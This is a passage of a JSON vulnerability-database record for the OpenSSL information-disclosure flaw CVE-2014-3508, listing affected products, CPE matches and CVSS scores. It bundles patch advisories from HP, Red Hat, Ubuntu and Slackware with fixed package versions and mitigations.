"freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "8.2-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "-release-p42", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7855072.040.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.3" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "6655072.060.134.32804" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "6.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "6.4-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "icewall sso dfw r1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.07" } ], "sources": [ { "db": "BID", "id": "69075" }, { "db": "NVD", "id": "CVE-2014-3508" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8za:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3508" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "130815" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "132467" }, { "db": "PACKETSTORM", "id": "137201" }, { "db": "PACKETSTORM", "id": "128131" } ], "trust": 0.5 }, "cve": "CVE-2014-3508", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-3508", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3508", "trust": 1.0, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3508", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3508" }, { "db": "NVD", "id": "CVE-2014-3508" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The OBJ_obj2txt function in crypto/objects/obj_dat.c in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i, when pretty printing is used, does not ensure the presence of \u0027\\0\u0027 characters, which allows context-dependent attackers to obtain sensitive information from process stack memory by reading output from X509_name_oneline, X509_name_print_ex, and unspecified other functions. OpenSSL is prone to an information disclosure vulnerability. \nAn attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. \nThe following versions are vulnerable:\nOpenSSL 0.9.8 versions prior to 0.9.8zb. \nOpenSSL 1.0.0 versions prior to 1.0.0n. \nOpenSSL 1.0.1 versions prior to 1.0.1i. The HP Matrix\nOperating Environment v7.2.3 Update kit applicable to HP Matrix Operating\nEnvironment 7.2.x installations is available at the following location:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=HPID\n\nNOTE: Please read the readme.txt file before proceeding with the\ninstallation. \n\nReferences:\n\nCVE-2014-3505 - Remote Denial of Service (DoS)\nCVE-2014-3506 - Remote Denial of Service (DoS)\nCVE-2014-3507 - Remote Denial of Service (DoS)\nCVE-2014-3508 - Remote Disclosure of Information\nCVE-2014-3510 - Remote Denial of Service (DoS)\n\nSSRT101686\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: Red Hat JBoss Enterprise Application Platform 6.3 openssl security update\nAdvisory ID: RHSA-2014:1297-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1297.html\nIssue date: 2014-09-24\nCVE Names: CVE-2014-3505 CVE-2014-3506 CVE-2014-3508 \n CVE-2014-3510 \n=====================================================================\n\n1. Summary:\n\nAn update for the OpenSSL packages for Red Hat JBoss Enterprise Application\nPlatform 6.3 that fixes multiple security issues is now available from the\nRed Hat Customer Portal. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Description:\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7. \n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nIt was discovered that the OBJ_obj2txt() function could fail to properly\nNUL-terminate its output. This could possibly cause an application using\nOpenSSL functions to format fields of X.509 certificates to disclose\nportions of its memory. (CVE-2014-3505,\nCVE-2014-3506)\n\nA NULL pointer dereference flaw was found in the way OpenSSL performed a\nhandshake when using the anonymous Diffie-Hellman (DH) key exchange. (CVE-2014-3510)\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3.0 as\nprovided from the Red Hat Customer Portal are advised to apply this update. \nThe JBoss server process must be restarted for the update to take effect. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying this update, back up your\nexisting Red Hat JBoss Enterprise Application Platform installation and\ndeployed applications. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. ============================================================================\nUbuntu Security Notice USN-2308-1\nAugust 07, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) cryptographic library and tools\n\nDetails:\n\nAdam Langley and Wan-Teh Chang discovered that OpenSSL incorrectly handled\ncertain DTLS packets. A remote attacker could use this issue to cause\nOpenSSL to crash, resulting in a denial of service. (CVE-2014-3505)\n\nAdam Langley discovered that OpenSSL incorrectly handled memory when\nprocessing DTLS handshake messages. A remote attacker could use this issue\nto cause OpenSSL to consume memory, resulting in a denial of service. \n(CVE-2014-3506)\n\nAdam Langley discovered that OpenSSL incorrectly handled memory when\nprocessing DTLS fragments. A remote attacker could use this issue to cause\nOpenSSL to leak memory, resulting in a denial of service. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-3507)\n\nIvan Fratric discovered that OpenSSL incorrectly leaked information in\nthe pretty printing functions. (CVE-2014-3508)\n\nGabor Tyukasz discovered that OpenSSL contained a race condition when\nprocessing serverhello messages. A malicious server could use this issue\nto cause clients to crash, resulting in a denial of service. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-3509)\n\nFelix Gr=C3=B6bert discovered that OpenSSL incorrectly handled certain DTLS\nhandshake messages. A malicious server could use this issue to cause\nclients to crash, resulting in a denial of service. (CVE-2014-3510)\n\nDavid Benjamin and Adam Langley discovered that OpenSSL incorrectly\nhandled fragmented ClientHello messages. If a remote attacker were able to\nperform a man-in-the-middle attack, this flaw could be used to force a\nprotocol downgrade to TLS 1.0. This issue only affected Ubuntu 12.04 LTS\nand Ubuntu 14.04 LTS. (CVE-2014-3511)\n\nSean Devlin and Watson Ladd discovered that OpenSSL incorrectly handled\ncertain SRP parameters. A remote attacker could use this with applications\nthat use SRP to cause a denial of service, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \n(CVE-2014-3512)\n\nJoonas Kuorilehto and Riku Hietam=C3=A4ki discovered that OpenSSL incorrectly\nhandled certain Server Hello messages that specify an SRP ciphersuite. A\nmalicious server could use this issue to cause clients to crash, resulting\nin a denial of service. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-5139)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.5\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.17\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.20\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2308-1\n CVE-2014-3505, CVE-2014-3506, CVE-2014-3507, CVE-2014-3508,\n CVE-2014-3509, CVE-2014-3510, CVE-2014-3511, CVE-2014-3512,\n CVE-2014-5139\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.5\n https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.17\n https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.20\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04424322\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04424322\nVersion: 1\n\nHPSBGN03099 rev.1 - HP IceWall SSO Dfw, SSO Agent and MCRP running OpenSSL,\nRemote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-09-01\nLast Updated: 2014-09-01\n\nPotential Security Impact: Remote disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP IceWall SSO\nDfw, SSO Agent and MCRP running OpenSSL. \n\nHP IceWall SSO Agent Option v8.0, v8.0 2007 Update Release 2, and v10.0\nHP IceWall MCRP v2.1, v3.0\nHP IceWall SSO Dfw v8.0, v8.0 R1, v8.0 R2, v8.0 R3, and v10.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP recommends the following software update options to resolve this\nvulnerability for HP IceWall SSO Dfw, SSO Agent and MCRP. \n\n 1. HP IceWall SSO Agent and MCRP\n\n - OpenSSL patches are available for RHEL:\nhttps://access.redhat.com/security/cve/CVE-2014-3508\n\n - OpenSSL patches are available for HP-UX. \n\n Please refer to HP Security Bulletin HPSBUX03095: https://h20564.www2.h\np.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04404655\n\n 2. HP IceWall SSO Dfw\n\n Updated OpenSSL is available for the HP IceWall SSO Dfw Bundle:\nhttp://www.hp.com/jp/icewall/_patchaccess\n\nHP recommends the following mitigation information to protect against\npotential risk for the following HP IceWall products. \n\n HP IceWall SSO Dfw and MCRP\n\n If possible, do not use SHOST setting which allows IceWall SSO Dfw or\nMCRP to use SSL/TLS for back-end web server connection. \n\n HP IceWall SSO Dfw\n\n If possible, do not use SHOST and set CC_DECODE_FLG to 0 which will\ndisable certificate decode by HP IceWall SSO Dfw . \n\nNote: The HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 2 September 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.0.19 (GNU/Linux)\n\niEYEARECAAYFAlQGEj8ACgkQ4B86/C0qfVne6gCg99hMorczaPKAZbOnaQb7D4Gr\n/hMAoLzofSZ3Qg4e+kXrFqUAnpOjkOUK\n=kaPy\n-----END PGP SIGNATURE-----\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware 